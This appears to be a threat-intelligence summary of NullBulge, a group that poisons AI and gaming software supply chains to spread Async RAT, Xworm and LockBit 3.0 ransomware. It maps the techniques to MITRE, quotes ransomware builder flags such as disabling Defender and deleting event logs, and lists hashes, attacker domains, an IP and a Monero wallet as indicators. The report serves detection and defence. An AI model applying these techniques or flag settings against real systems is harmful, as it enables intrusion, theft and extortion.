NullBulge is a new cybercriminal group focusing on AI- and gaming-focused ecosystems, leveraging software supply-chain attacks and public repositories to spread malware and ransomware. It uses Async RAT, Xworm, and customized LockBit payloads, while portraying hacktivist motives to disguise financial aims. #NullBulge #AppleBotzz #ComfyUI_LLMVISION #BeamNG #DiscordWebhook #GitHub #HuggingFace #DisneyLeaks #LockBitBlack #AsyncRAT #Xworm
Keypoints
- NullBulge targets AI-centric applications and gaming communities with malware through public code repositories and mod distributions.
- The group poisons the software supply chain by injecting malicious code into legitimate distributions on GitHub, Hugging Face, and Reddit.
- Malware campaigns include trojanized Python libraries and Lua-based BeamNG mods delivering Async RAT/Xworm before then deploying LockBit payloads.
- AppleBotzz identity is used to host code and posts across multiple platforms, with questions about whether it and NullBulge are the same actor.
- Disney leaks (Slack data, DuckTales assets) and other high‑profile targets illustrate the group’s expansive data-leak strategy.
- Exfiltration is conducted via Discord webhook, and the campaign emphasizes data collection and encryption payloads with configurable options.
MITRE Techniques
- [T1195] Supply Chain Compromise – “poisoning the well”: the group targets the software supply chain by injecting malicious code into legitimate software distribution mechanisms, exploiting trusted platforms like GitHub, Reddit and Hugging Face to maximize their reach.
- [T1105] Ingress Tool Transfer – “These campaigns resulted in malicious Python scripts which harvest and transmit data via Discord webhook.”
- [T1059.001] PowerShell – “The Lua files contain base64-encoded PowerShell that, when decoded, downloads and executes the Async RAT sample (via Invoke-WebRequest).”
- [T1027] Obfuscated/Compressed Files and Information – “The obfuscated powershell was injected into the mod files that subsequently downloaded Async RAT or Xworm, which in turn led to the deployment of their customized LockBit payloads.”
- [T1567.002] Exfiltration to Web Service – “harvest and transmit data via Discord webhook.”
- [T1070.004] File Deletion – “delete_eventlogs”: true (ransomware/cleanup behavior via configuration).
- [T1562.001] Impair Defenses: Disable/Modify System Tools – “kill_defender”: true.
- [T1021.002] Lateral Movement: SMB/Windows Admin Shares – “gpo_netspread”: true, “psexec_netspread”: false (lateral spread via Group Policy/Object tooling).
- [T1486] Data Encrypted for Impact – “NullBulge payloads are built using the LockBit 3.0 (aka LockBit Black) builder” (encryption-focused payloads).
Indicators of Compromise
- [SHA1] Async RAT (via Pixeldrain) – f37da01783982b7b305996a23f8951693eb78f72, and 2 more hashes
- [SHA1] Async RAT (via Pastebin) – 0cd5dc12bca41f6667547aa10b9cf1d989ba30a0
- [SHA1] Xworm (via Pastebin) – 843d0df759ffd79b00f0adef3371e003a3539977
- [SHA1] anthopic-0.21.3-py3-none-any.whl – c6a884dcf21c44de3e83427a28428c24582a8b6f
- [SHA1] openai-1.16.2-py3-none-any.whl – 5a18ba89c118a7c31f3e8f674727da08779421ce
- [SHA1] LockBit 3.0 – 89d9b7c3eff0a15dc9dbbfe2163de7d5e9479f58
- [SHA1] admin.py – 93460d0789dce9cf65a90e542424b0ac057e1dc5
- [SHA1] Fadmino.py – dcb47900458692589a594a293c1c7c2559cc4cbe
- [SHA1] cadmino.py – 9eb83ab3f53e99cdc9948a6123c7c90fad9e3991
- [SHA1] VersionCheck.lua – 2d1dca9c10996143b698a9351d1eb446c19f92a7
- [SHA1] Build/config notes – 3f6c619bdc7d931a9a9f82dfc77963a02ab9c2bf
- [Domain] group.goocasino.org, nullbulge.com, nullbulge.se, nullbulge.co, nullblgtk7dwzpfklgktzll27ovvnj7pvqkoprmhubnnb32qcbmcpgid.onion
- [IP] 86.107.168.9
- [Monero] 45i7kjWZuzJ4PdSbandaaE8S6mQATmneTYEpgsaaCqDmc7foEJDXwxd3ABR8bn6YE4c7hZ2dYEEr1CwG48gAknPL6zUpYyV